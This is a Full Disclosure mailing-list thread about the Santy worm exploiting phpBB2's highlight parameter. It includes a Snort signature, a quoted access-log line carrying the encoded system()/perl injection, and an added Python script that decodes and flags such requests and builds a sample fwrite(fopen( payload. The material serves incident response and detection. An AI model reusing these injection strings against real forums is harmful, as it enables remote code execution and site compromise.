Full Disclosure mailing list archives

RE: Worm hitting PHPbb2 Forums


From: "M. Shirk" <shirkdog_list () hotmail com>
Date: Tue, 21 Dec 2004 19:53:09 -0500

I missed an important "F" on my previous post for these snort sigs.

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A Worm"; flow:to_server,established; uricontent:"/viewtopic.php?"; nocase; uricontent:"&highlight='.fwrite(fopen("; nocase; reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; sid:9999999; rev:1;)

Shirkdog
http://www.shirkdog.us



From: "Mike" <mike_sha () shaw ca>
To: <mark () onnow net>, "L. Walker" <lwalker () magi net au>
CC: <incidents () securityfocus com>, <full-disclosure () lists netsys com>
Subject: RE: Worm hitting PHPbb2 Forums
Date: Tue, 21 Dec 2004 13:28:27 -0500

Does this affect PHPBB2 in general, or is it platform specific as well?

Mike Fetherston

> -----Original Message-----
> From: mark () onnow net [mailto:mark () onnow net]
> Sent: Tuesday, December 21, 2004 12:47 PM
> To: L. Walker
> Cc: incidents () securityfocus com; full-disclosure () lists netsys com
> Subject: Re: Worm hitting PHPbb2 Forums
>
> From what I have read, this can happen in any phpbb version lower than
> 2.0.11
>
> This exploit is becoming frequent.  Normally uploading a ddos bot.
>
> Mark
>
> Quoting "L. Walker" <lwalker () magi net au>:
>
> > Just spotted two clients hit by this.  One client didn't update his
> > software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
> > Chkrootkit says it's Adore, however could be something else.  Datacenter
> > wasn't very smart and has since wiped the server, so no binaries or other
> > evidence.
> >
> > Generation 12 only wiped out PHP files, replacing them with its own
> > message on other client's PHPbb2 forum.  Access logs show:
> >
> > 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 270
> > "http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527"
> > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> >
> > --
> > L. Walker <lwalker at magi dot net dot au>
> > Network Administrator / Consultant
> > --
> >
>
>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
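The Snort signature at the top of this message and the access-log entry quoted further down show the same attack from two sides: the worm closes phpBB's quoted highlight string with a single quote, appends a PHP call, and double-URL-encodes the quote and the dots (%2527, %252e) while spelling every string out as a chr() chain. A responder going through logs by hand has to undo both layers before the request is readable. The script below is an added example written for this archive page, not code from any poster in the thread or from phpBB or Snort: it parses Apache combined-format lines, double-decodes the highlight parameter, flags values that match the `'.function(` shape covered by both the fwrite(fopen( signature and the system( request in the log, and rebuilds the chr() chains into the command the attacker sent. The first sample line is the request quoted in the thread (referer and user-agent trimmed); the other lines are constructed, with placeholder addresses, session ids and file names.

```python
"""Decode and flag phpBB 'highlight' injection attempts (Santy-style) in
Apache combined access logs.  Example code added for this archive page, not
part of any post in the thread.  Sample lines other than the first are
constructed; 192.0.2.10 / 10.0.0.5, the session ids and file names are
placeholders."""
import re
from urllib.parse import unquote

# Apache combined format: ip ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# chr(N) calls joined by '.'; the worm double-encodes the dots as %252e,
# so they only become literal dots after two rounds of decoding.
CHR_CHAIN_RE = re.compile(r'chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*')
CHR_RE = re.compile(r'chr\((\d+)\)')
# A highlight value that closes phpBB's quoted string and concatenates a
# PHP call: the shape of both '.fwrite(fopen( (Snort sig) and '.system( (log).
INJECT_RE = re.compile(r"'\s*\.\s*[A-Za-z_]\w*\s*\(")


def chr_chain(text):
    """Encode text the way the worm does: chr(N) joined by double-encoded dots.
    Used here only to build a constructed sample log line."""
    return '%252e'.join('chr(%d)' % ord(c) for c in text)


def highlight_param(url):
    """Return the still-encoded highlight= value from a request URL, or None."""
    query = url.partition('?')[2]
    for pair in query.split('&'):
        name, sep, value = pair.partition('=')
        if sep and name == 'highlight':
            return value
    return None


def double_decode(value):
    """Undo two rounds of percent-encoding: %2527 -> %27 -> ' """
    return unquote(unquote(value))


def resolve_chr(text):
    """Replace chr(N).chr(M)... chains with the string they build."""
    return CHR_CHAIN_RE.sub(
        lambda m: ''.join(chr(int(n)) for n in CHR_RE.findall(m.group(0))),
        text)


def scan(lines):
    """Return one record per log line whose highlight value is an injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = highlight_param(m.group('url'))
        if raw is None:
            continue
        decoded = double_decode(raw)
        if INJECT_RE.search(decoded):
            hits.append({'ip': m.group('ip'), 'time': m.group('time'),
                         'status': m.group('status'),
                         'payload': resolve_chr(decoded)})
    return hits


# Line 1: the request quoted in the thread.  Lines 2-3: constructed benign
# searches.  Line 4: constructed fwrite(fopen( variant in the signature's shape.
SANTY_LINE = (
    '66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?'
    'p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem('
    'chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)'
    '%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)'
    '%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)'
    '%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)'
    '%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)'
    '%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)'
    '%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)'
    '%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)'
    '%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)'
    '%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))'
    '%252e%2527 HTTP/1.0" 200 270 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"')
FWRITE_PAYLOAD = ('%2527%252Efwrite(fopen(' + chr_chain('santy.txt')
                  + ',chr(119)),' + chr_chain('hello') + ')%252e%2527')
SAMPLE_LOG = [
    SANTY_LINE,
    '10.0.0.5 - - [21/Dec/2004:18:09:01 +1100] "GET /forum/viewtopic.php?t=12'
    '&highlight=snort+rule HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [21/Dec/2004:18:09:30 +1100] "GET /forum/viewtopic.php?t=12'
    '&highlight=don%27t+panic HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [21/Dec/2004:18:12:40 +1100] "GET /forum/viewtopic.php?t=7'
    '&highlight=' + FWRITE_PAYLOAD + ' HTTP/1.0" 200 270 "-" "-"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ip'], hit['time'], hit['status'], hit['payload'])
```

Run against the log line from the thread, the rebuilt payload reads `'.system(perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)").'`: the request creates a file and echoes a fixed token into the HTTP response, which is consistent with the 200 status and 270-byte body in the log. Two design points: the check matches on the decoded `'.name(` shape rather than on one function name, so both the fwrite(fopen( form in the Snort rule and the system( form in the log are caught by the same test, and a benign search term containing an apostrophe (`don't panic`) is not flagged because nothing follows the quote with a dot and a call.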

